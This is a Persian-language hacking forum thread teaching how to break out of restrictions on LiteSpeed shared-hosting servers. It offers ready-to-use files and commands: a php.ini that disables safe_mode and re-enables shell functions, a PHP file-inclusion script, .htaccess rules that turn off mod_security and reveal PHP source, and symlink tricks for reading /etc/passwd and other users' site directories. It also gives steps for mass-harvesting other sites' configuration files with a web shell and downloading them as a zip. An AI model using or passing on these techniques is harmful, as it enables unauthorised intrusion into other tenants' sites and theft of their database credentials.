SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

.:: تاپیک جامع آموزش بایپس سرورهای LiteSpeed ::.

بستن
X
بستن
 
  • صفحه از 1
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید
قبلی template بعدی
  • #1

    .:: تاپیک جامع آموزش بایپس سرورهای LiteSpeed ::.

    درود.
    همونطور که میدونید وب سرور لایت اسپید نسبت به بقیه وبسرورها یکم امن تر هست و خیلی ها وقتی میبینن وبسرور لایت اسپید هست کلّاً بیخیال هک سرور میشن !
    در این تاپیک متودهای مختلف نفوذ به این وب سرور آموزش داده خواهد شد.
    این آموزش ها شامل غیرفعال کردن عناصر امنیتی و سیملینک و... در این سرورها خواهد بود.
    لطفاً اسپم ندید و فقط در صورتی پست بدید که از متودهای بایپس این سرور باشه.
    بدرود...
     
    [align=center]مشاجره، نادانی انسان را آشکار می کند و چیزی به مطلب حق او نمی افزاید. امام علی (ع)

    همانا ارزشمند ترين بی نيازی عقل، بزرگ ترين فقر بی خردی، ترسناك ترين تنهايی خود پسندی و گرامی ترين ارزش خانوادگی، اخلاق نيكوست. امام علی (ع)[/align]
     
    برچسب ها: هیچ یک
  • #2
    RE: .:: تاپیک جامع آموزش بایپس سرورهای LiteSpeed ::.

    اولین پست رو با آموزش بایپس سیف مود و فانکشن های بسته شده آغاز میکنم.
    برای این کار ابتدا یک دایرکتوری بسازید. به طور مثال اسم دایرکتوری، IRH هست.
    سپس سه فایل زیر رو در دایرکتوری IRH ایجاد کنید.
    1- Php.ini :
    [align=left]
    کد:
    safe_mode = Off
disable_Functions = NONE
exec = On
shell_exec = On
    [/align]

    2- Ini.php :
    [align=left]
    کد:
    <?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["file"]);
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["ss"]);
?>
    [/align]

    3- Htaccess. :
    [align=left]
    کد:
     <Files *.php> 
ForceType application/x-httpd-php4 
</Files>  
ahm tas: <IfModule mod_security.c>
    SecFilterEngine Off
    SecFilterScanPOST Off
</IfModule>
    [/align]

    پس از اینکه این سه فایل رو ایجاد کردید، یک شلر داخل دایرکتوری IRH بریزید و سپس اجراش کنید.
    هم اکنون میبینید که تمام فانکشن ها باز شدند و سیف مود هم خاموش هست.
    توجّه : این روش رو هرگز روی سرورهای آپاچی و در کل غیر از لایت اسپید اجرا نکنید چون تمام فایل های PHP با ارور Internal مواجه میشن و اکسس شما میپره.
    بدرود..
     
    [align=center]مشاجره، نادانی انسان را آشکار می کند و چیزی به مطلب حق او نمی افزاید. امام علی (ع)

    همانا ارزشمند ترين بی نيازی عقل، بزرگ ترين فقر بی خردی، ترسناك ترين تنهايی خود پسندی و گرامی ترين ارزش خانوادگی، اخلاق نيكوست. امام علی (ع)[/align]
     

    نظر

    • #3
      RE: .:: تاپیک جامع آموزش بایپس سرورهای LiteSpeed ::.

      درود.
      امروز با 2 آموزش در رابطه با سیملینک در سرور لایت اسپید همراه شما خواهیم بود.
      1- ابتدا به سایت مورد نظر سیم زده و اگر با ارور Forbidden مواجه شدید، از این Htaccess استفاده کنید :
      [align=left]
      کد:
      Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any
      [/align]

      2- یکی از روش های بایپس سیملینک، سیم زدن به روش ini هست یعنی این که شما هم کانفیگ و هم دایرکتوری رو میاید در یک فایل ini سیم می زنمید به طور مثال : ln -s /home/user/public_html irh.ini
      سپس این Htaccess رو هم میسازید :
      [align=left]
      کد:
      Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
      [/align]

      در آخر متذکّر بشم که هنوز هیچ راه 100% و پابلیک شده ای برای بایپس سیملینک در لایت اسپید وجود نداره و سرورهایی که خوب کانفیگ نشده باشن با این متودها بایپس میشن.
      تا آموزش بعدی بدرود...
       
      [align=center]مشاجره، نادانی انسان را آشکار می کند و چیزی به مطلب حق او نمی افزاید. امام علی (ع)

      همانا ارزشمند ترين بی نيازی عقل، بزرگ ترين فقر بی خردی، ترسناك ترين تنهايی خود پسندی و گرامی ترين ارزش خانوادگی، اخلاق نيكوست. امام علی (ع)[/align]
       

      نظر

      • #4
        RE: .:: تاپیک جامع آموزش بایپس سرورهای LiteSpeed ::.

        درود..//
        هیچ کدام جواب بده نیستن..//

        نظر

        • #5
          RE: .:: تاپیک جامع آموزش بایپس سرورهای LiteSpeed ::.

          نوشته اصلی توسط ARTA
          درود..//
          هیچ کدام جواب بده نیستن..//
          سلام
          دوست عزیز یکم بیشتر دقت میکردید پایین پست آخر نوشته بودم که این روش ها 100% نیست. من در بسیاری از سرورهایی که لایت بودن از این روش ها استفاده کردم و اکثر اوقات نتایج خوبی هم گرفتم. برعکش سرورهایی هم دیدم که اصلاً phpini و htaccess و اینجور چیزا حالیشون نیس.
          من این مطالب رو طبق تجربیات نه خیلی زیاد و نه خیلی کم خودم و آموزش هایی که در سراسر نت هست میزارم.

          ###############################################

          آموزشی که امروز میخوام خدمتتون عرض کنم در رابطه با بایپس سیملینک هست وهای قبلی یکم راحت تره !
          1- ابتدا یک اسکریپت بریزید که با کمک اون بتونید کانفیگ های سایت ها رو به صورت جمعی بزنید ( مثل قابلیتی که در شل های webroot و izocin و اسکریپت های پرل هم هست ) .
          2- بعد از این که عمل بیرون کشیدن کانفیگ ها توسط اسکریپت انجام شد، فقط کافی هست که اون دایرکتوری رو فشرده کنید ( فرمت حتماً باید Zip باشه ).
          3- این کار رو هم در شل و هم در سی پنل میتونید انجام بدید.
          برای فشرده کردن یک دایرکتوری با فرمت Zip در شل کامند زیر رو وارد میکنیم :
          [align=left]
          کد:
          zip -r filename.zip directoryaddress
          [/align]
          و در سی پنل هم بر روی دایرکتوری مورد نظر راست کلیک کرده و Compress و zip.
          4- سپس فایل زیپ رو دانلود میکنیم.

          ################################################

          بازهم متذکر میشم که این روش ها 100% نیست !
          بدرود.
           
          [align=center]مشاجره، نادانی انسان را آشکار می کند و چیزی به مطلب حق او نمی افزاید. امام علی (ع)

          همانا ارزشمند ترين بی نيازی عقل، بزرگ ترين فقر بی خردی، ترسناك ترين تنهايی خود پسندی و گرامی ترين ارزش خانوادگی، اخلاق نيكوست. امام علی (ع)[/align]
           

          نظر

          • #6
            RE: .:: تاپیک جامع آموزش بایپس سرورهای LiteSpeed ::.

            "priv8 bypass passwd in LiteSpeed"
            یک روش خوب برای بایپس ارور forbidden هنگام خواندن فایل passwd (تا چند وقت پیش priv8 بود البته راحت میشد به این متد رسید)
            روش کلی:
            ln -s /etc/passwd  passwd.txt
            خب با باز کردن فایل passwd.txt با ارور forbidden مواجه میشیم

            برای بایپس میایم از یکی از دو دستور زیر استفاده میکنیم:
            [php]
            ln -s /etc/passwd README
             ln -s /etc/passwd HEADER
            [/php]
            این 2 دستور در یک دایرکتوری اجرا میکنیم و وقتی دوباره به اون دایرکتوری میریم میبینیم که فایل passwd به ما نشاد داده خواهد شد

            فیلم این روش توسط b0x عزیز(SPT to b0x)
            LiteSpeed-by-1337b0x-Private

            نظر

            قبلی template بعدی
            صبر کنید ..
            X